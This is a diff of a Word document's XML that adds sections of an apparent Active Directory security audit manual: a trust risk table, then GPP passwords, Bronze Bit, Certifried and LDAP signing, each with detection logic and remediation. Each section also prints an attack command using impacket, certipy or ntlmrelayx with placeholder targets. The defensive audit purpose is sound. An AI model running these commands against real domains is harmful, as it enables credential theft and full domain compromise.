+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Risk Assessment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3120"/>
+        <w:gridCol w:w="1560"/>
+        <w:gridCol w:w="4680"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Configuration</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Risk</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Why</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Forest trust + SID filtering OFF</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>CRITICAL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>SID history injection across forest boundary</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Bidirectional + no SID filtering</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>HIGH</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Pivot path with SID history abuse</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Bidirectional trust</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>MEDIUM</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Pivot possible if partner domain compromised</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>RC4 encryption on trust</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1560" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LOW</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4680" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Weak encryption</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Output is a Rich table showing trust partner, direction, type, SID filtering status, and risk level.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="28" w:name="_Toc224561308"/>
@@ -10828,6 +10335,499 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="110" w:name="_Toc224561360"/>
+      <w:r>
+        <w:t>5.7  GPP Passwords — MS14-025</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="110"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Group Policy Preferences created before KB2962486 may store passwords encrypted with a publicly known AES key. Any domain user can read SYSVOL and decrypt these passwords.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Detection: Queries all groupPolicyContainer objects via LDAP and checks gPCFileSysPath attributes for SYSVOL paths containing potential cpassword XML files (Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Remediation: Apply KB2962486, delete existing GPP XML files containing cpassword, reset affected passwords.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9360" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="120" w:type="dxa"/>
+              <w:bottom w:w="120" w:type="dxa"/>
+              <w:left w:w="200" w:type="dxa"/>
+              <w:right w:w="200" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="A8D8EA"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>Get-GPPPassword.py domain/user:pass@DC_IP</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="111" w:name="_Toc224561361"/>
+      <w:r>
+        <w:t>5.8  Bronze Bit — CVE-2020-17049</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="111"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Bypasses the S4U2Self forwardable flag validation in constrained delegation. An attacker with a constrained delegation account can impersonate any user to any service in the delegation list, even without protocol transition enabled.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Detection: Checks if constrained delegation accounts exist AND the domain functional level suggests the patch (KB4598347) has not been applied (DFL &lt; 7).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Remediation: Apply KB4598347 on all DCs, set PerformTicketSignature=2 registry key.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9360" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="120" w:type="dxa"/>
+              <w:bottom w:w="120" w:type="dxa"/>
+              <w:left w:w="200" w:type="dxa"/>
+              <w:right w:w="200" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="A8D8EA"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>getST.py -spn TARGET_SPN -impersonate Administrator -force-forwardable -dc-ip DC_IP domain/user:pass</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="112" w:name="_Toc224561362"/>
+      <w:r>
+        <w:t>5.9  Certifried — CVE-2022-26923</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="112"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Any domain user can create a machine account (if MachineAccountQuota &gt; 0), set its dNSHostName to match a DC, request a certificate, and authenticate as the DC — full domain compromise. Severity: CRITICAL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Detection: Checks three conditions via LDAP: (1) AD CS enrollment services exist, (2) ms-DS-MachineAccountQuota &gt; 0, (3) domain appears unpatched (DFL &lt; 7).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Remediation: Apply KB5014754 (May 2022 updates), set MachineAccountQuota=0, enable strong certificate mapping.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9360" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="120" w:type="dxa"/>
+              <w:bottom w:w="120" w:type="dxa"/>
+              <w:left w:w="200" w:type="dxa"/>
+              <w:right w:w="200" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="A8D8EA"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>certipy account create -u user@domain -p pass -dc-ip DC_IP -user FAKE$ -dns DC_FQDN</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="113" w:name="_Toc224561363"/>
+      <w:r>
+        <w:t>5.10  LDAP Signing Not Required</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="113"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>If LDAP signing is not enforced on the DC, NTLM relay attacks to LDAP are possible (ntlmrelayx, mitm6, Responder). This enables privilege escalation via RBCD or delegation abuse. Severity: HIGH.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Detection: Checks whether the current LDAP connection was established without signing (port 389 vs 636/LDAPS).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Remediation: Set “Domain controller: LDAP server signing requirements” to “Require signing” via GPO. Enable LDAP channel binding (LdapEnforceChannelBinding=2).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9360" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="120" w:type="dxa"/>
+              <w:bottom w:w="120" w:type="dxa"/>
+              <w:left w:w="200" w:type="dxa"/>
+              <w:right w:w="200" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="A8D8EA"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>ntlmrelayx.py -t ldap://DC_IP --delegate-access</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p>
       <w:r>
         <w:br w:type="page"/>
